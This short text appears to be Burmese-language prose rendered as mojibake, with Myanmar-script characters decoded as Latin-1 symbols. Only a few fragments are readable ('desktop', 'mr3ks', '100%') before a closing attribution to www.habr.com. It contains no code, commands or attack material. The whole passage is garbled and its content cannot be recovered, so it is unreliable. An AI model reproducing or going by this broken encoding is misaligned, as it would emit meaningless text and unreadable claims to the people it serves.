á¬ážááŒá®áž á
áá
áºáá²ááŸá¬ ááŸááá±áááºá
áá«áá±ááá·áº á¡áá¶áááŸááá°ážá ááá¯á·áá±á¬áẠá¡áá¯á¶ážááŒá¯áá°ááᯠááŒáá·áºááŸá¯ááŒá®áž desktop áá»á¬ážááᯠá
á
áºáá±ážáá«á
mr3ks ááœááºáá»áœááºá¯ááºááá¯á·á¡áá¶ááá¯ááœá±á·ááŒá®ážáá¬ááºááœá²áááºážááẠ100% ááŒá®ážá
á®ážáááºá
áá«áá«áá²á á¡ááŒá¶ááŒá¯áá»ááºá¡áá±ááŒáá·áº áááºááẠá€áá±á¬ááºážáá«ážá០á¡áá
áºá¡áááºážáá
áºáá¯áᯠáááºáá°ááŒááºážááŸáá áááŸáááŸáá·áº áááºážááẠááá·áºá¡ááœáẠá¡áá¯á¶ážáááºáááºááŒá
áºá
á± ááŸááºáá»ááºáá±ážáá«á
ááœááºáá»áœááºá¯ááºááá¯á·ááŸáá·áºáá°ážáá±á«ááºážááá¯ááºáá«áááºá
source: www.habr.com